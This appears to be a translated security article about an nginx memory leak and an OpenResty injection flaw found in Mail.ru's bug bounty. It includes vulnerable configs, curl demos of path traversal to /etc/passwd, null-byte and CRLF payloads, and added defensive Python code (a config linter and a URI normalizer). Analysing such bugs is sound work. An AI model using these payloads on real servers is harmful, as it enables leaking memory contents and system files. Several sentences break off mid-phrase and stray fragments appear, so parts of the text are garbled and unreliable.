About a year ago, on March 21, 2019, within
This was the most serious bug, because ... the requests also carry session cookies. A few hours later a temporary fix was deployed that filtered out the zero byte (as it turned out later, this was not enough, because it was still possible to inject CRLF / ASCII 13, 10, which lets you alter the headers and body of the HTTP response; this is less critical, but still unpleasant). At the same time, the problem was handed over to security researchers and developers to find and eliminate the root causes of the bug.
Mail.ru Mail is a very complex application: a large number of different front-end/back-end components, both open source (many thanks to all free software developers) and developed in-house, can take part in producing a response. We managed to rule out every component except nginx and OpenResty and narrow the problem down to the call
OpenResty is a popular project that lets you write Lua scripts inside nginx, and it is used in many Mail.ru projects, so the problem was not considered resolved. After some time, we came back to it to understand the real causes and the possible consequences, and to give recommendations to developers. Taking part in digging through the source code was
- In nginx, when rewrite is used with user-supplied data, directory traversal (and possibly SSRF) is possible in some configurations, but this is a known fact and should be caught by static configuration analyzers such as Nginx Amplify and gixy from Yandex (yes, we use it too, thanks). When OpenResty is used, this behaviour is easier to miss, but it did not affect our configuration.
Configuration example:
location ~ /rewrite {
    rewrite ^.*$ $arg_x;
}
location / {
    root  html;
    index index.html index.htm;
}
Demonstration:
curl localhost:8337/rewrite?x=/../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
- nginx has a bug that leaks memory when the rewrite string contains a null byte. When a redirect is issued, nginx allocates a new buffer sized to the full length of the string, but copies the string into it with a string function for which the zero byte is a terminator, so only the part up to the zero byte is copied; the rest of the buffer holds uninitialized data. A detailed analysis can be found here.
Configuration example (^@ is the zero byte):
location ~ /memleak {
    rewrite ^.*$ "^@asdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdasdf";
}
location / {
    root  html;
    index index.html index.htm;
}
Demonstration:
curl localhost:8337/secret -vv
...
curl localhost:8337/memleak -vv
...
Location: http://localhost:8337/secret
...
- nginx protects GET parameters from injection of service characters and only allows GET parameters to be used in rewrite. Therefore the injection cannot be exploited through user-controlled parameters in nginx itself. POST parameters are not protected. OpenResty lets you work with both GET and POST parameters, so when POST parameters are used via OpenResty, special characters can be injected.
Configuration example:
location ~ /memleak {
    rewrite_by_lua_block {
        ngx.req.read_body();
        local args, err = ngx.req.get_post_args();
        ngx.req.set_uri( args["url"], true );
    }
}
location / {
    root  html;
    index index.html index.htm;
}
Result:
curl localhost:8337 -d "url=secret" -vv
...
curl localhost:8337 -d "url=%00asdfasdfasdfasdfasdfasdfasdfasdf" -vv
...
Location: http://localhost:8337/{...may contain secret...}
...
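A minimal static check in the spirit of the analyzers mentioned above (gixy and Nginx Amplify), added here as an illustration and not taken from either tool: it walks the location blocks of a config and flags the three shapes this section shows (a rewrite target built from request variables, a rewrite literal containing control bytes, and an OpenResty ngx.req.set_uri() fed from request arguments). The sample configs are constructed re-typings of the ones above.

```python
import re

# Constructed sample configs: re-typings of the three shapes shown on this page, plus a clean one.
SAMPLE_CONFIGS = {
    "rewrite_arg": "location ~ /rewrite { rewrite ^.*$ $arg_x; }",
    "rewrite_nul": 'location ~ /memleak { rewrite ^.*$ "\x00asdfasdfasdf"; }',
    "lua_post": (
        "location ~ /memleak { rewrite_by_lua_block { ngx.req.read_body(); "
        'local args, err = ngx.req.get_post_args(); ngx.req.set_uri( args["url"], true ); } }'
    ),
    "clean": "location / { root html; index index.html index.htm; }",
}

# Request-controlled variables: a rewrite target built from them needs validation first.
USER_VARS = re.compile(r"\$(?:arg_\w+|args|request_uri|uri|document_uri|http_\w+|cookie_\w+)")
# rewrite <regex> <replacement> [flag];  the replacement may be quoted.
REWRITE = re.compile(r"\brewrite\s+(\S+)\s+(\"[^\"]*\"|'[^']*'|[^\s;]+)")
CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def iter_locations(text):
    """Yield (header, body) for each top-level location block, matching braces by hand."""
    pos = 0
    while True:
        m = re.search(r"\blocation\b[^{]*\{", text[pos:])
        if not m:
            return
        start = pos + m.end()
        depth, i = 1, start
        while i < len(text) and depth:
            depth += {"{": 1, "}": -1}.get(text[i], 0)
            i += 1
        yield text[pos + m.start():start - 1].strip(), text[start:i - 1]
        pos = i


def lint(config):
    """Return a list of (location header, message) findings for one config text."""
    findings = []
    for header, body in iter_locations(config):
        for m in REWRITE.finditer(body):
            target = m.group(2)
            if USER_VARS.search(target):
                findings.append((header, "rewrite target built from a request-controlled variable"))
            if CONTROL.search(target):
                findings.append((header, "rewrite target contains a control byte (NUL/CR/LF)"))
        if "rewrite_by_lua" in body and "ngx.req.set_uri" in body and (
            "get_post_args" in body or "get_uri_args" in body
        ):
            findings.append((header, "ngx.req.set_uri() fed from request arguments without validation"))
    return findings
```

Running lint() over a real nginx.conf (with includes expanded) is enough to catch these shapes; anything flagged should either be rewritten to use a whitelist mapping or be validated before the rewrite/set_uri call.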
Further actions
The problem was reported to the nginx and OpenResty developers. The developers do not consider it a security bug in nginx, since in nginx itself there is no way to exploit the error through injection of special characters; the fix
Portswigger
So what was the bug, and what could have been done to prevent it?
Was there a bug in nginx? Yes, there was, because leaking internal memory is a bug in any case.
Was there a bug in OpenResty? Yes, at the very least the security of the functionality OpenResty provides was not examined and documented.
Was there a configuration/usage error with OpenResty? Yes, because without an explicit statement in the documentation, an unverified assumption was made about the security of the functionality being used.
Which of these bugs is the security vulnerability worth the $10000 bounty? For us, this is generally not important. In any software, especially at the junction of several components, and particularly ones supplied by different projects and developers, no one can ever guarantee that every aspect of their behaviour is known and documented and that there are no bugs. Therefore, a security vulnerability is wherever something actually affects security.
In any case, it is good practice to normalize, or as far as possible restrict/filter, the input data passed into any external module/API, unless there is an explicit statement and a clear understanding that this is not required.
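As a concrete form of the recommendation above, here is an added reference implementation (Python, not code from the article or from OpenResty) of the normalization one would port into the rewrite_by_lua_block before calling ngx.req.set_uri(): it percent-decodes once, rejects control bytes (NUL, CR, LF), absolute and protocol-relative URLs, and any ".." that climbs above the root, and returns a canonical path. The sample inputs are constructed, the first three mirroring the demos above; the ASCII-only rule is an assumption for internal paths.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote_to_bytes

# Constructed sample inputs -> expected result (None = rejected). The first three mirror the demos above.
SAMPLES = {
    "secret": "/secret",
    "/../../../../../../../etc/passwd": None,      # climbs above the root
    "%00asdfasdfasdfasdfasdfasdfasdfasdf": None,   # NUL after percent-decoding
    "/a%0d%0ainjected-header: 1": None,            # CR/LF would split the redirect header
    "http://attacker-controlled.example/": None,   # absolute URL, not an internal path
    "//attacker-controlled.example/x": None,       # protocol-relative URL
    "/docs/../index.html": "/index.html",          # harmless traversal, normalized
    "/a/b/%2e%2e/c": "/a/c",                       # encoded dot segments are decoded first
}


def normalize_internal_uri(raw: str) -> Optional[str]:
    """Return a canonical absolute path safe to hand to an internal redirect, or None to reject."""
    if not raw or len(raw) > 2048:
        return None
    decoded = unquote_to_bytes(raw)          # decode exactly once, then judge the bytes
    if any(b < 0x20 or b == 0x7F for b in decoded):
        return None                          # NUL, CR, LF and other control bytes
    try:
        path = decoded.decode("ascii")       # assumption: internal paths here are ASCII
    except UnicodeDecodeError:
        return None
    if "://" in path or path.startswith("//") or "\\" in path:
        return None                          # would become an external (SSRF-style) target
    if not path.startswith("/"):
        path = "/" + path
    depth = 0                                # reject '..' that climbs above the root;
    for seg in path.split("/"):              # normpath alone would silently drop it
        if seg == "..":
            depth -= 1
            if depth < 0:
                return None
        elif seg not in ("", "."):
            depth += 1
    return posixpath.normpath(path)
```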
Erratum
From what happened
bug bounty - a bug-hunting contest
bug report - a notification of a bug
redirect - redirection
open source - open source
exploit - work on a bug
Source: www.habr.com